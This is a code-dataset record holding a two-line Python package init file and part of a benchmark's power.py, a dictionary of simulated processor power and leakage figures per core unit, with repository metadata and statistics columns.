Ciprian15/DeepDoc
|
4ae22030db2a7081cb179e52ac6c1c896f528fb1
|
[
"MIT"
] | null | null | null |
src/webapp/data/__init__.py
|
Ciprian15/DeepDoc
|
4ae22030db2a7081cb179e52ac6c1c896f528fb1
|
[
"MIT"
] | null | null | null |
src/webapp/data/__init__.py
|
Ciprian15/DeepDoc
|
4ae22030db2a7081cb179e52ac6c1c896f528fb1
|
[
"MIT"
] | null | null | null |
from webapp.data import load
from webapp.data import update
| 29.5
| 30
| 0.847458
| 10
| 59
| 5
| 0.6
| 0.4
| 0.56
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118644
| 59
| 2
| 30
| 29.5
| 0.961538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
affdae3f21fb1244cb6df6978b23c239ff3f054d
| 68,617
|
py
|
Python
|
benchmarks/SimResults/Paper2_rr_spec_base/cmp_perlbenchbzip2gccbwaves/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/Paper2_rr_spec_base/cmp_perlbenchbzip2gccbwaves/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/Paper2_rr_spec_base/cmp_perlbenchbzip2gccbwaves/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0373927,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.232059,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.200288,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.377336,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.653409,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.374748,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.40549,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.342274,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.90845,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0378387,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0136787,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.11298,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.101162,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.150819,
'Execution Unit/Register Files/Runtime Dynamic': 0.114841,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.283251,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.742252,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.90002,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00291518,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00291518,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00254578,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000989163,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00145321,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00982934,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0277121,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.09725,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.18594,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.324832,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.330305,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.70926,
'Instruction Fetch Unit/Runtime Dynamic': 0.789928,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0775151,
'L2/Runtime Dynamic': 0.01304,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.52601,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.59394,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.106403,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.106403,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.03052,
'Load Store Unit/Runtime Dynamic': 2.22509,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.262373,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.524746,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.093117,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0941226,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.384619,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0537208,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.704099,
'Memory Management Unit/Runtime Dynamic': 0.147843,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.9915,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.13201,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0208834,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.194813,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.347706,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.42363,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0133598,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.213182,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0715596,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.164446,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.265245,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.133887,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.563578,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.177107,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.29584,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0135191,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00689761,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0549037,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.051012,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0684228,
'Execution Unit/Register Files/Runtime Dynamic': 0.0579096,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.119007,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.318584,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.55863,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00161133,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00161133,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00144666,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000583646,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000732792,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00540212,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0139063,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0490392,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.11931,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.164001,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.166559,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.48921,
'Instruction Fetch Unit/Runtime Dynamic': 0.398908,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0403734,
'L2/Runtime Dynamic': 0.00826047,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.90924,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.812966,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0540971,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.054097,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.1647,
'Load Store Unit/Runtime Dynamic': 1.13385,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.133394,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.266788,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0473421,
